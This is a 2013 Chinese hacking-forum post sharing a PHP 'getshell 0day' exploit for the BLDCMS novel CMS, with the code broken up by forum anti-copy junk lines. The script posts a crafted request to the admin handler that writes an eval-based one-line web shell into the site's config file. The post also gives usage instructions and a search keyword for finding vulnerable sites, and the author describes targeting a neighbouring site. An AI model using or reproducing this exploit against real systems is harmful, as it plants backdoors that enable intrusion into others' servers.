中国网络渗透测试联盟
标题:
BLDCMS(白老大小说) Getshell 0day EXP
[打印本页]
作者:
admin
时间:
2013-3-26 20:49
标题:
BLDCMS(白老大小说) Getshell 0day EXP
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
5 Y* z. W& h7 a3 f4 |' ]
0 I& ?" i1 W) T3 h, | w
% u: @/ s! [7 O& v
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
j, d+ u$ Z }# K. f
; ~. u# ^7 C, e* o7 x. I* K
既然都有人发了 我就把我之前写好的EXP放出来吧
. G6 M' w) y; X/ |7 _8 E
1 q1 S g/ q! ?2 G
view source print?01.php;">
& B, P8 l- [1 p. o$ z2 U3 t
02.<!--?php
. x$ t9 T6 z& P" r* T2 a) A
03.echo "-------------------------------------------------------------------
0 j) e a9 t# c! n' J0 G9 T
04.
6 q& W* G. w' a, s5 J
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
2 V4 K+ G. h1 B h( Z* r0 Y
06.
2 _7 L4 }" h) i7 E2 a
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
, t1 O8 W, V; @# m; q- D
08.
, m/ ?- S. Z4 O6 @4 y3 x. O
09.QQ:981009941\r\n 2013.3.21\r\n
) T( P( R1 p4 S9 C; ]
10.
7 o$ @; ~" e6 ^) Z+ F- y
11.
: O7 H# J; n! d! g7 |4 B+ s
12.用法:php.exe EXP.php
www.baidu.com
/cms/ pass(一句话密码
" p9 D9 p* y, o8 }, z/ q
13.
, b W% y4 z1 x0 ]* f; Q
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
' D5 n' R& C- t' x% q
15.
7 ?: T6 Y# [8 S% R
16.--------------------------------------------------------------------\r\n";
, ^3 `2 j7 D2 Z
17.$url=$argv[1];
! C+ [- w1 x. V( z
18.$dir=$argv[2];
. L, @2 z6 ]# j6 T6 y1 o3 y" R
19.$pass=$argv[3];
( U; }; `# c/ E# C! l! ~
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
& @; Y! X" Z, c+ j; M6 T+ {
21.if (emptyempty($pass)||emptyempty($url))
, z; N0 [; n, ^6 B# {1 O, Q. n9 `
22.{exit("请输入参数");}
- P$ }: }# E2 K8 _. s5 b
23.else
3 E2 x9 }; S: o
24.{
! Q8 ?) B5 d D; G/ g
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
4 W3 y% t. G' Q( N% D
26.
: R8 V% C* A1 @$ u9 P
27.al;
0 v' R$ C* I& S* R% o Q
28.$length = strlen($fuckdata);
3 u# A5 U+ t" ]9 o! d; u: B6 Z
29.function getshell($url,$pass)
& Z" T3 O6 h7 P9 P$ J& w
30.{
* G0 ^* ]' L( N' j4 W# ^
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
, h; y K( b0 g6 n. g% R
32.$header = "
OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
; c& {( w C7 I$ ~- ~. A
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
: C0 h3 }1 ?0 p6 x; N
34.$header .= "User-Agent: MSIE\r\n";
& t9 g5 \0 c6 o" k. T q* n6 a
35.$header .= "Host:".$url."\r\n";
' `5 O- |% \$ R4 ~( {
36.$header .= "Content-Length: ".$length."\r\n";
' x$ Z( n7 c" D
37.$header .= "Connection: Close\r\n";
" p+ Q" V# E+ {
38.$header .="\r\n";
) q: ?0 v; w, Y) \/ {. A
39.$header .= $fuckdata."\r\n\r\n";
' @4 k$ q& y! @& i! `& e
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
) K* Q+ D) D, s- J
41.if (!$fp)
5 x( n7 e' J0 O5 }# @9 e+ p+ t2 x
42.{
! c' Y) X5 @ q0 o, \0 D/ l
43.exit ("利用失败:请检查指定目标是否能正常打开");
( Q' Q+ F: r% |" ?8 @; q% S
44.}
4 Z" L& f/ u. }+ }, b
45.else{ if (!fputs($fp,$header))
3 N- J5 I; L |3 O
46.{exit ("利用失败");}
8 l% A V' I' P7 n+ x6 g0 U: c2 k
47.else
. S1 r1 T9 i3 l" V( \1 k1 q4 O
48.{
9 d3 w0 a2 K) c4 C1 f
49.$receive = '';
$ B1 s0 A+ J9 Y" f2 j" Q# h
50.while (!feof($fp)) {
$ l# ~! U+ M% u' C8 G. k, ~
51.$receive .= @fgets($fp, 1000);
6 h! L8 B A/ f
52.}
: |% L) ? C+ S2 A2 `
53.@fclose($fp);
- H' u$ A: D3 w' r7 F7 Q
54.echo "$url/$dir/conn/config/normal2.php pass
pass(如连接失败 请检查目标
. B; Z. C3 ?9 V! @. J
55.
8 q1 h/ M0 K/ C! ^% r- W2 g
56.GPC是否=off)";
6 ~" e! S4 M" _ K
57.}}
4 w2 g& _6 L+ F* ~- e3 n
58.}
& E) o, X7 `; s
59.}
7 p. q4 n: F5 {8 H
60.getshell($url,$pass);
( \0 k$ t) @/ c
61.?-->
" F+ K9 |) |3 ]$ n
+ D6 k7 O& e* O8 B7 i: S: z3 F
# O7 `9 U# k! @; M
; p& V% E5 W T# U. a' e
by 数据流
^2 a m0 C& P/ Q
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2